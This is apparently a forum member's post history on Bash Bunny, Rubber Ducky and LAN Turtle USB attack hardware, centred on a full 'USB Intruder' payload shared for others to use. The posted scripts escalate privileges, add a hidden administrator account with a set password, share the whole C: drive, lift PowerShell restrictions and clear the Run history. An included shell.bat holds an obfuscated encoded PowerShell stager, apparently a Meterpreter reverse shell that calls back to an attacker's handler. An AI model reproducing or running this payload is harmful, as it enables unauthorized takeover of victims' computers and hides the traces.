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Posts posted by B0rk

  1. 27 minutes ago, Dave-ee Jones said:

    The Bash Bunny is running a DHCP server. You can see the IP range here: https://wiki.bashbunny.com/#!./index.md#Default_Settings

    There's only 3 IPs so you can't have much connected to it, really, but I'm sure there's a setting somewhere you can tweak.

    Exactly, that's why I was curious. I'm just not sure how exactly it could be done, but I was just thinking about it while I was trying to sleep last night. - Curiosity, nothing more.

  2. Just curious if anyone knows if it would be possible to connect the BashBunny to multiple hosts simultaneously? I understand that the BashBunny probably wouldn't be able to run a normal payload (I.E. HID, Serial, etc.) to multiple systems at a time unless it was running as an Ethernet Adapter, but I was wondering if it is potentially possible as it can run a DHCP Server that can hand out multiple addresses.

    I.E. If you were able to obtain access to a server room or other location where there are multiple hosts that the BashBunny could be connected to at the same time (since servers are generally stacked in a rack) and have a payload execute upon issuing an address to said hosts.

    Maybe like using a USB Female to Female adapter connected to a USB Hub and using USB Male to Male cables to connect to the hosts.

    Just some food for thought and possible research.

    **Obviously, there would be some major research, scripting, and automation involved to create such a payload.

  3. 9 hours ago, Black_R1d3r said:

    Hello All,

    My first time here and would like to say that I though this payload really interesting, but I do have a question might me dumb but didn't find an answer anywhere.

    The idea for the shell.bat script is a place holder that can be replaced by my own bat file. I know I can generate one on cmd on windows but does anyone have a sample or a template on how it should look like so I would replace with the proper info and save the bat file?

    I am new into it and I am stuck on this part.

    Thank you!

    The shell script is meant to provide you with a shell into the "victim's" computer (research how reverse shell's work, there's tons of video's on youtube for it). You can also package an exe or any file of your choosing for your remote shell, just adjust the script(s) accordingly.

  4. Hello all,

    I am posting the Ducky Script for the USB Intruder I made available on the BashBunny. If you would like to run USB Intruder on the TwinDuck FW, you will need to download the BashBunny payloads from Github and delete the payload.txt from the USB_Intruder payload folder and replace it with the following code for the inject.bin file. I'm being lazy on this post, so if you want more information on it, check the readme.md from my BB Payload. You will also need to name the storage "Ducky" (minus the quotes) in order for this payload to execute properly.

    DELAY 2000
    GUI d
    DELAY 100
    GUI r
    DELAY 500
    STRING powershell -Command "Start-Process cmd -Verb RunAs"
    DELAY 1000
    ALT y
    DELAY 800
    STRING mkdir C:\Windows\ProgData
    STRING attrib +h C:\Windows\ProgData
    STRING powershell
    DELAY 800
    STRING Set-ExecutionPolicy Unrestricted
    STRING powershell ".((gwmi win32_volume -f 'label=''Ducky''').Name+'\d.cmd')"
    DELAY 2000
    STRING cd $Env:WinDir\ProgData
    STRING .\seq1.ps1
    DELAY 1000
    STRING powershell -WindowStyle Hidden $Env:WinDir\ProgData\shell.bat
    STRING exit
    STRING exit
    DELAY 500
    GUI r
    DELAY 500
    STRING powershell -WindowStyle Hidden Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue


  5. 23 minutes ago, PoSHMagiC0de said:

    Haha, I love this.  I had a feeling so I tried.  I connected to your thread with my Win test VM that is running Avast and it went off like a christmas tree, only on your thread and then ti blocked me from viewing it hehe.  Another test you can try is on your test machine put Avast on it and see if your payloads still run or if they are killed.

    It should only be blocking the shell.bat file as it is known by AV mfg's. It was only put on there as an example/placeholder (the LHOST is set to and LPORT to 8443). It's just a Veil-Evasion generated payload. Everything else should execute just fine.

  6. 7 hours ago, PoSHMagiC0de said:

    I can suggest some improvements that can not only keep it compatible with the twin ducky but also shorten your Quack commands.

    Place all your commands into a powershell script except for the privilege escalation.  Make your first quack commands get you privilege escalated cmd and then the second to pull and run the script from the USB location.  That will make your quack statements only necessary for getting the cmd prompt and running the script.  Cleanup of the registry can even be handled at the end of the script in the script also.  Since it is using USB it will still work for the Twin Duck too.

    Thanks for the suggestion. I've cut down runtime by 13 or so seconds with that. I did have to keep the creation of the ProgData folder and Hidden attribute in the first part of the cmd prompt phase to allow for a destination of the initial copy, but I'll be updating this again in the near future. I left the shell.bat launch as is since it creates a separate hidden instance for it to run in rather than having it hanging up a script of scripts right at the end (since they're run sequentially).

  7. You're going to love it (the bashbunny). I'll be modifying this payload in the future (maybe not the near future...) and adding to it as well. Feel free to hit me up on IRC or PM on here - goes for everyone. 

  8. 11 hours ago, Dave-ee Jones said:

    Thing is, to create an Admin user you first need Admin rights, therefore you don't really get anywhere with creating a Meterpreter payload.

    It doesn't have to be a meterpreter payload, that's the beauty of it. That bat file (shell.bat) can be quite literally anything you want it to be and do what you want it to do.

    --Also, I know I'm using the old form of ducky script for the HID commands, but I wanted to make it cross platform and have the ability to be used on a TwinDucky as well.

  9. Just a first script for the BB for me guys, chill and have an alco beverage or something. No need to get worked up. It's not necessarily meant for a corp env. I appreciate the constructive criticism,  but I had fun and it was just a first step.

  10. Posting for discussion and feedback. I will be submitting this for approval into the repository in the near future. I have attached a zip containing all necessary files as well for those of you that want to pick it up and run with it.

    Read the README below and in the zip first, and post any comments or questions you may have.



    # USB Intruder for BashBunny and TwinDucky
    - Title:         USB Intruder
    - Author:        B0rk
    - Version:       1.0
    - Target:        Windows XP SP3+
    - Props:         Hak5Darren, Diggster, IMcPwn
    - Category:      Infiltration/Execution
    ## Description
    Infiltrates a target system and performs the following:
    Creates a new user with the following credentials - pwnie:dungothacked
    Shares the root of the C: drive with full permissions to the new user pwnie with the label HACKED$ (Hidden)
    Created a hidden ProgData folder in the %UserProfile%
    Sets powershell execution to unrestricted
    Copies files from the USB_Intruder directory on the BashBunny to the hidden ProgData folder in the user profile
    Executes the eject.ps1 file that properly ejects the Mass Storage portion of the payload
    Executes a shell.bat file that is in fact a Meterpreter script calling back to the Attacker's Handler (not going into detail on how to do that)
    Cleans up the Run dialogue history
    **undo.bat is provided to reverse the first 3 actions above (in case you want to test)**
    **Be sure to have your handler ready to accept the incoming connection from the victim**
    ## Configuration
    Replace the shell.bat file in the USB_Intruder folder with your own custom Meterpreter script or what ever bat file you would like.
    **You will need to change delays accordingly to the profile of the victim's PC hardware.**
    ## STATUS
    | LED             | Status           |
    | --------------- | ---------------- |
    | Solid White     | Initialization   |
    | Blue Flashing   | HID Phase 1      |
    | Solid Magenta   | HID Phase 2      |
    | Red Flashing    | Ejecting Storage |
    | Solid Cyan      | HID Phase 3      |
    | Yellow Flashing | Cleanup of Run   |
    | Green Flashing  | Sync/EOF         |
    | Solid Green     | 100% Complete    |


    #TITLE: USB Intruder
    #AUTHOR: B0rk
    #VERSION: 1.0
    #PROPS: Hak5Darren, Diggster, IMcPwn
    #OS: Windows (Requires Powershell and Admin Rights)
    #DESCRIPTION: Opens up attack vectors and a meterpreter powershell script on a Victim PC. **Based on usb_exfiltrator by DK & Friends**
    #White - Initialization
    #Blue Blinking - phase 1
    #Magenta - phase 2
    #Cyan - phase 3
    #Yellow Blinking - Cleanup
    #Green - Attack Completion
    #Initialization - Setting AttackModes
    LED W
    #Initialization Completed
    #Beginning of phase 1
    LED B 10
    #Sharing C Drive as HACKED$ and adding user pwnie with password of dungothacked to local Administrators group.
    #Also creates a new (hidden) folder in the current user's profile to drop files into for execution later on.
    Q DELAY 2000
    Q GUI d
    Q DELAY 100
    Q GUI r
    Q DELAY 500
    Q STRING powershell -Command "Start-Process cmd -Verb RunAs"
    Q DELAY 800
    Q ALT y
    Q DELAY 500
    Q STRING net user pwnie dungothacked /add
    Q STRING net localgroup Administrators pwnie /add
    Q STRING net share HACKED$=C:\ /grant:pwnie,FULL
    Q STRING mkdir %UserProfile%\\ProgData
    Q STRING attrib +h %UserProfile%\\ProgData
    Q STRING powershell
    Q DELAY 500
    Q STRING Set-ExecutionPolicy Unrestricted
    Q STRING exit
    Q STRING exit
    Q DELAY 500
    #End of phase 1
    #Beginning of phase 2
    LED M
    #Copying Files from BashBunny to %UserProfile%\ProgData
    Q GUI r
    Q DELAY 500
    Q STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
    Q DELAY 2000
    #End of phase 2
    #Ejection of Mass Storage
    LED R 0
    Q GUI d
    Q DELAY 250
    Q GUI r
    Q DELAY 500
    Q STRING powershell -Command "Start-Process cmd -Verb RunAs"
    Q DELAY 800
    Q ALT y
    Q DELAY 800
    Q STRING powershell
    Q DELAY 500
    Q STRING cd \$Env:UserProfile\\ProgData
    Q STRING .\\eject.ps1
    Q STRING exit
    Q STRING exit
    Q DELAY 500
    #End of Ejection
    #Beginning of phase 3
    LED C
    #Running PS script for Remote Shell from %UserProfile%\ProgData Directory.
    Q GUI r
    Q DELAY 500
    Q STRING powershell -Command "Start-Process cmd -Verb RunAs"
    Q DELAY 800
    Q ALT y
    Q DELAY 800
    Q STRING powershell -windowstyle hidden \%userprofile%\\ProgData\\shell.bat
    Q DELAY 200
    #End of phase 3
    LED Y 100
    #Clears complete run history
    Q GUI r
    Q DELAY 500
    Q STRING powershell -WindowStyle Hidden Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
    #End of Cleanup
    #Completion of script
    LED G 100
    LED G


    @echo OFF
    REM Setting dst to %BASHBUNNY%\Payload\$Switch_Position\USB_Intruder\
    set dst=%~dp0USB_Intruder
    REM Copying files from dst to %USERPROFILE%\ProgData
    xcopy /C /Q /G /Y /S %dst%\*.* %USERPROFILE%\ProgData\

    undo.bat (for undoing the first 3 actions of the payload **For Testing Purposes/Not Required**)

    net user pwnie /delete
    net share HACKED$ /delete
    RD /S /Q %UserProfile%\ProgData

    Inside the USB_Intruder folder:


    $BB = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BASHBUNNY' } | Select-Object -First 1 -ExpandProperty Driveletter
    $driveEject = New-Object -comObject Shell.Application

    shell.bat (should be replaced with your own meterpreter script)

    @echo off
    if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9pIEP7OrxhZe5KtYMcELpdgRSqF5pq7QnMhTXqH0GmxB7xlveus17yE8t9vTFySfj0JeZnx7DzPzDxj9gRX8M5pTAZS3mS5NtZ1lmgUyvZZkEjpeFPIy5kUMRSWWzpwY+k93Ch7aw08CGNLLntS6titfTLvJYnBomhCKZSFZD0Wz1gb85dYSqXV/TZ/dd8abTG2XvS/ufQNcov3KR3JK5cXu2etEbPS4htSlsfLF2bHYPIZe2R/dN9ywzMkrOPlAxaVcC354m3kC9pNQmU47xrWbHcsoQ47vff9wYfr3z/e/PHnp+Ho8+1fd+P7Lw+PX//+h8/iBOeLVHxbykzp/MkUtlytN9vnsHXW7vx6/tvFpRPc637KTc8YvnW9xrxUcYUOsctW3g4M2pL64LoTYjeZToGtfr4B32GIvCgN+p9n36jN4I/LzAvoAb9AuGmFIfj4BJdn3v41u4Udm1fsnagVBO3vc03FxamvDyno3ckVsGTiLtD6hqtEZ+BnfCMyysqS4BOqhU296T6q+bF59CY7wg5yo2NqNewmvCI6ZRuCo8cJsH/3EaBKiMKG2BekhhoXdq7C9Q/j7oDrBYq04Hr7/RuAxQ6IMbhMXIURE+BLC+cd+ndy4u1YSkg2YssKMCEEjADqAumKBEF8lxRXVAFpxUhGIObgUs8Lz4Nj1ymCYGvDuVx9/eJQmZMR2mCMZiVivNU0liFXfIFm2u1WXjR9NFbMBW0CPnApkoOc+lzKGcmSMHfMmhL3EcvIGFHB9eDG28JiFlTpH3HWlwKVjRosCz6S8NAUAcnXdcoCjU94yjpNcIb6WUjJTztBSPx1lhPYTFLFw/HNBzgPWhE8CurjuoDRved4EVMEuohg8n5r8SCovGpDFgz0WknNkwG33HVSa/Oie3raCoMfv+5Fp9M+ZcoBr8E0XSI6frXoJA3MZmgGOBdKHAbEnsAf0WKBQ+jtMwd8RVaR8xjh4LmuR1mAn/OisKkpG2xzxXS3+9OHJ2yyvJZbM9y0wzCkoxN60aTu1l2prMgwoD1Fo/N6LkUw5KZIuaSh9HW+dVnehLAJk5d1nrpsQ2tERvvM9bwmHEGq0ujK2+8NITbZplkdYbVuurS+KiVp5vBN8ccSMaetw1iTqC/OO2G4p9nH6W7/Hw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVRtb9pIEP7OrxhZe5KtYMcELpdgRSqF5pq7QnMhTXqH0GmxB7xlveus17yE8t9vTFySfj0JeZnx7DzPzDxj9gRX8M5pTAZS3mS5NtZ1lmgUyvZZkEjpeFPIy5kUMRSWWzpwY+k93Ch7aw08CGNLLntS6titfTLvJYnBomhCKZSFZD0Wz1gb85dYSqXV/TZ/dd8abTG2XvS/ufQNcov3KR3JK5cXu2etEbPS4htSlsfLF2bHYPIZe2R/dN9ywzMkrOPlAxaVcC354m3kC9pNQmU47xrWbHcsoQ47vff9wYfr3z/e/PHnp+Ho8+1fd+P7Lw+PX//+h8/iBOeLVHxbykzp/MkUtlytN9vnsHXW7vx6/tvFpRPc637KTc8YvnW9xrxUcYUOsctW3g4M2pL64LoTYjeZToGtfr4B32GIvCgN+p9n36jN4I/LzAvoAb9AuGmFIfj4BJdn3v41u4Udm1fsnagVBO3vc03FxamvDyno3ckVsGTiLtD6hqtEZ+BnfCMyysqS4BOqhU296T6q+bF59CY7wg5yo2NqNewmvCI6ZRuCo8cJsH/3EaBKiMKG2BekhhoXdq7C9Q/j7oDrBYq04Hr7/RuAxQ6IMbhMXIURE+BLC+cd+ndy4u1YSkg2YssKMCEEjADqAumKBEF8lxRXVAFpxUhGIObgUs8Lz4Nj1ymCYGvDuVx9/eJQmZMR2mCMZiVivNU0liFXfIFm2u1WXjR9NFbMBW0CPnApkoOc+lzKGcmSMHfMmhL3EcvIGFHB9eDG28JiFlTpH3HWlwKVjRosCz6S8NAUAcnXdcoCjU94yjpNcIb6WUjJTztBSPx1lhPYTFLFw/HNBzgPWhE8CurjuoDRved4EVMEuohg8n5r8SCovGpDFgz0WknNkwG33HVSa/Oie3raCoMfv+5Fp9M+ZcoBr8E0XSI6frXoJA3MZmgGOBdKHAbEnsAf0WKBQ+jtMwd8RVaR8xjh4LmuR1mAn/OisKkpG2xzxXS3+9OHJ2yyvJZbM9y0wzCkoxN60aTu1l2prMgwoD1Fo/N6LkUw5KZIuaSh9HW+dVnehLAJk5d1nrpsQ2tERvvM9bwmHEGq0ujK2+8NITbZplkdYbVuurS+KiVp5vBN8ccSMaetw1iTqC/OO2G4p9nH6W7/Hw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();")



    • Upvote 3
  11. Thank you Dice, your find assisted in the creation of a WORKING ps1 script.

    $BB = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BASHBUNNY' } | Select-Object -First 1 -ExpandProperty Driveletter
    $driveEject = New-Object -comObject Shell.Application

    I've tested it with multiple drive letters and it PROPERLY ejects the drive. 

    THANK YOU TO EVERYONE WHO CONTRIBUTED! - I only hope that this helps for future payloads.

    • Upvote 1
  12. 7 hours ago, Dice said:
    $driveEject = New-Object -comObject Shell.Application


    Dice, this does work for a Volume Letter (E:, D:, etc.), but I'm unable to get it to recognize a Volume Label such as 'BASHBUNNY'. Any ideas?

  13. Yes, the LANTurtle is (basically) a micro PC (you can really make one [or at least kind of] from a Pi Zero [youtube "seytonic $7 LANTurtle"]). It would be feasible, but you have the potential to be fighting with the DHCP server of the network you're attacking. This attack could potentially work great for ARP poisoning though or remote shell access into a network.

  14. Great Question,

    I don't believe that would be a possibility (out of the box) as the computer that the LAN Turtle is connected to is receiving it's information from the USB side of the adapter, and the Ethernet end is only being used for traffic to the computer. However, if you get into the LAN turtle via SSH you could more than likely change the configuration for the network adapters or payloads and possibly have the turtle do what you would like (but again, it would require re-configuring the adapters or payload on the turtle).

    -- I am not 100% certain of this, but this is what my logic is telling me (which sometimes is broken).

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